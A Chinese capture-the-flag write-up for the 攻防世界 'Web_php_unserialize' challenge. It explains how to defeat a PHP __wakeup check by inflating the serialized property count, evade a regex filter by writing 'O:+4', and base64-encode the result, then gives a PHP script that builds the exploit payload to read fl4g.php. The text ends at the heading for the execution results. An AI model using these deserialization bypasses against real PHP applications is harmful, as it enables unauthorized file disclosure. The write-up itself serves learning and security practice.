攻防世界之-Web_php_unserialize

打开靶场后网页显示

从注释可以看到flag可能存在fl4g.php中，要想返回fl4g.php需要绕过以下三个条件

1 要绕过wake up 函数
__wakeup()
是在反序列化操作中起作用的魔法函数，当unserialize的时候，会检查时候存在__wakeup()函数，如果存在的话，会优先调用__wakeup()函数。

绕过：
__wakeup()函数漏洞就是与对象的属性个数有关，如果序列化后的字符串中表示属性个数的数字与真实属性个数一致，那么i就调用__wakeup()函数，如果该数字大于真实属性个数，就会绕过__wakeup()函数。

2 要绕过正则表达式
(preg_match(’/[oc]:\d+:/i’, $var))
而正则匹配的规则是: 在不区分大小写的情况下 ， 若字符串出现 “o:数字” 或者 "c:数字’ 这样的格式 ， 那么就被过滤 .很明显 ， 因为 serialize() 的参数为 object ，因此参数类型肯定为对象 " O " ， 又因为序列化字符串的格式为 参数格式:参数名长度 ， 因此 " O:4 " 这样的字符串肯定无法通过正则匹配
绕过
而O:+4没被过滤说明绕过了过滤而且最后的值不变。

3 必须是base64加密
这个简单我们直接对序列化的内容进行加密

 编写代码

<?php
class Demo {
    private $file = 'index.php';
    public function __construct($file) {
        $this->file = $file;
    }
    function __destruct() {
        echo @highlight_file($this->file, true);
    }
    function __wakeup() {
        if ($this->file != 'index.php') {
            //the secret is in the fl4g.php
            $this->file = 'index.php';
        }
    }
}
$A = new Demo ('fl4g.php');             //创建对象
$C = serialize($A);                     //对对象A进行序列化
$C = str_replace('O:4','O:+4',$C);      //绕过正则表达式过滤
$C = str_replace(':1:',':2:',$C);      //wakeup绕过
var_dump($C);
var_dump(base64_encode($C));            //base64加密

?>
执行结果：